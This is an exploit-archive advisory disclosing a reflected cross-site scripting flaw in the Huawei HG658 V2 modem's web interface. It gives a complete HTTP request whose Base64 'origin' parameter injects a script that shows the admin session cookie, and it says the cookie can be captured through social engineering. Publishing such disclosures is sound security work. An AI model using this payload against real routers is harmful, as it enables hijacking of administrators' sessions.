Huawei HG658 V2 Cross Site Scripting

2017.03.08
Credit: KnocKout
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: CWE-79

HUAWEI HG658 V2 => Modem Web Interface Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://cyber-warrior.org ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Hardware/Web App : HUAWEI |~Affected Version : HG658 V2 |~Official Web: http://www.huawei.com ####################INFO################################ the same network with a social engineering scenario is on the modem manager to do the admin cookies can be captured ######################################################## ---------------------------------------------------------- HTTP://192.168.1.1/html/pub/WanConnectionInfo.html?origin=[Base64 XSS Code] Proof image: http://i.hizliresim.com/EgqAkv.png ---------------------------------------------------------- Request ---------------------------------------------------------- GET http://192.168.1.1/html/pub/WanConnectionInfo.html?origin=Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4= Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: username=admin; SessionID_R3=CaRyWGufAmjwkbRbn0HTfRFZ0GqzVM6y38r0r0NvID0BPc5prfJNScondh34nopeC0dRFiPtEx4IpngNmkZ6te9tlWDKk8Hoolzo2FjW5nu3BeUn5uAb0k1FDgQG2zH Connection: keep-alive Upgrade-Insecure-Requests: 1 If-None-Match: R5


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top